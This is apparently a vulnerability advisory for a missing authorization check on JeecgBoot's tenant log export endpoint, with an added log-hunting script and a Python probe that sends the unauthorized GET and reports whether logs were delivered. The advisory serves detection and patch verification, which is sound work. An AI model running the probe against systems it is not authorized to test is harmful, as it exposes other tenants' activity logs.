JeecgBoot Improper Authorization Vulnerability in Tenant Log Export

Vulnerability

An improper authorization vulnerability has been identified in JeecgBoot versions through 3.8.2. The issue resides in the Tenant Log Export component, specifically the '/sys/tenant/exportLog' endpoint, which does not check that the caller is permitted to export the requested tenant's operation logs. As a result, any authenticated user can download tenant operation logs, which may contain sensitive information. The flaw can be exploited remotely, and a public exploit is available.

Impact

Exploitation of this vulnerability allows any authenticated user to download tenant operation logs, giving them access to information they are not authorized to see. Operation logs typically record user activities, source IP addresses and other operational data, which an attacker can use to profile accounts and plan further attacks. Because the logs reveal exactly which actions are recorded, the attacker can also shape later activity to avoid detection, and exposing user activity logs across tenants is a privacy violation in itself.
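The following is an added example, not code from the original advisory or from the JeecgBoot project: a small hunting script that scans reverse-proxy access logs for successful downloads from the export endpoint by accounts that are not expected to export tenant logs. The log format (Apache/Nginx "combined" format with the authenticated username substituted into the third field by the proxy), the sample lines and the allow-list of expected exporters are all constructed assumptions; adjust the regular expression to the format your proxy actually writes.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not real JeecgBoot traffic).
# Assumed layout: ip - user [timestamp] "METHOD path HTTP/x" status size "referer" "agent"
SAMPLE_LOG = """\
10.0.0.5 - admin [12/Sep/2025:15:01:02 +0000] "GET /sys/tenant/exportLog?tenantId=1 HTTP/1.1" 200 48213 "-" "Mozilla/5.0"
10.0.0.9 - jsmith [12/Sep/2025:15:03:44 +0000] "GET /sys/tenant/exportLog HTTP/1.1" 200 51077 "-" "python-requests/2.31"
10.0.0.9 - jsmith [12/Sep/2025:15:03:51 +0000] "GET /sys/tenant/exportLog?tenantId=2 HTTP/1.1" 200 60411 "-" "python-requests/2.31"
10.0.0.7 - mlee [12/Sep/2025:15:05:10 +0000] "GET /sys/tenant/exportLog HTTP/1.1" 403 112 "-" "Mozilla/5.0"
10.0.0.7 - mlee [12/Sep/2025:15:06:10 +0000] "GET /sys/user/list HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Parser for the assumed combined format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Endpoint named in the advisory.
EXPORT_PATH = "/sys/tenant/exportLog"


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_unexpected_exports(log_text, allowed_users):
    """Count successful (HTTP 200) downloads of the export endpoint per user,
    ignoring accounts on the allow-list. A refused attempt (403) is left out
    because it shows the check working; a successful download by an account
    that should not have it is the signal worth alerting on."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["path"] == EXPORT_PATH and rec["status"] == 200
                and rec["user"] not in allowed_users):
            hits[rec["user"]] += 1
    return dict(hits)


if __name__ == "__main__":
    for user, count in find_unexpected_exports(SAMPLE_LOG, {"admin"}).items():
        print(f"unexpected tenant log export: user={user} downloads={count}")
```

Run it against a real log by replacing SAMPLE_LOG with the file contents; once the instance is patched, the same query is still useful as a regression check, since the endpoint should then only ever return 200 for the allow-listed accounts.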

Reproduction

To reproduce this vulnerability, an authenticated user with low privileges sends a GET request to the '/sys/tenant/exportLog' endpoint, including the session cookie of the authenticated user. Because the endpoint performs no authorization check beyond authentication, the server returns the tenant operation log export, which may contain sensitive information. A 403 response, or a redirect to the login page, would indicate that the endpoint is protected; a successful response with the export payload confirms the missing check.
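As an added example (not code from the advisory or from the JeecgBoot project), the check below sends the GET described above and classifies the answer so the result can be recorded consistently before and after patching. It assumes a JeecgBoot instance reachable at a base URL you are authorized to test, and it accepts either the session cookie the advisory names or, for deployments that use JeecgBoot's JWT filter, an X-Access-Token header. The response heuristics (an attachment or spreadsheet content type meaning an export was delivered) are assumptions for this example, not documented JeecgBoot behaviour.

```python
import http.client
from urllib.parse import urlsplit

# Endpoint named in the advisory.
EXPORT_PATH = "/sys/tenant/exportLog"


def build_headers(session_cookie=None, access_token=None):
    """Request headers for the probe.

    The advisory describes authenticating with a session cookie. JeecgBoot's
    JWT filter reads its token from an X-Access-Token header, so that is
    accepted as well. Which credential a given deployment honours is an
    assumption; confirm it by inspecting a normal logged-in request.
    """
    headers = {"Accept": "*/*", "User-Agent": "authz-check/1.0"}
    if session_cookie:
        headers["Cookie"] = session_cookie
    if access_token:
        headers["X-Access-Token"] = access_token
    return headers


def classify(status, headers):
    """Map an HTTP response to a verdict on the authorization check.

    granted : a low-privilege caller received an export payload (vulnerable)
    denied  : explicit 403 (the behaviour a fix should produce)
    unauth  : the credential was not accepted; fix the probe, not the app
    unknown : anything else; inspect the body by hand

    Treating an attachment or spreadsheet/binary content type as "export
    delivered" is a heuristic assumption, not documented JeecgBoot behaviour.
    """
    h = {k.lower(): v.lower() for k, v in headers.items()}
    if status == 401:
        return "unauth"
    if status == 403:
        return "denied"
    if status in (301, 302, 303, 307) and "login" in h.get("location", ""):
        return "unauth"
    if status == 200:
        disposition = h.get("content-disposition", "")
        ctype = h.get("content-type", "")
        if "attachment" in disposition or any(
            marker in ctype for marker in ("spreadsheet", "excel", "octet-stream", "csv")
        ):
            return "granted"
    return "unknown"


def probe(base_url, session_cookie=None, access_token=None, timeout=15):
    """Send the GET from the advisory and return classify()'s verdict.

    base_url is an assumed parameter, e.g. "https://jeecg.example.internal".
    Only run this against systems you are authorized to test.
    """
    u = urlsplit(base_url)
    conn_cls = http.client.HTTPSConnection if u.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(u.netloc, timeout=timeout)
    try:
        conn.request("GET", EXPORT_PATH, headers=build_headers(session_cookie, access_token))
        resp = conn.getresponse()
        return classify(resp.status, dict(resp.getheaders()))
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    # Usage: python check_exportlog.py https://host "JSESSIONID=..." [X-Access-Token value]
    url, cookie = sys.argv[1], sys.argv[2]
    token = sys.argv[3] if len(sys.argv) > 3 else None
    print(probe(url, session_cookie=cookie, access_token=token))
```

Use a credential for an ordinary, low-privilege account in a tenant that should not be able to export logs; a "granted" verdict for that account reproduces the advisory, and after the fix the same call should return "denied". An "unauth" verdict means the credential itself was rejected, so the test says nothing about the authorization check yet.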

Added: Sep 12, 2025, 3:17 PM
Updated: Sep 12, 2025, 4:35 PM

Vulnerability Rating

Custom Algorithm
spread: 0.8
impact: 2.5
exploitability: 6.6
remediation: 0.0
relevance: 0.5
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.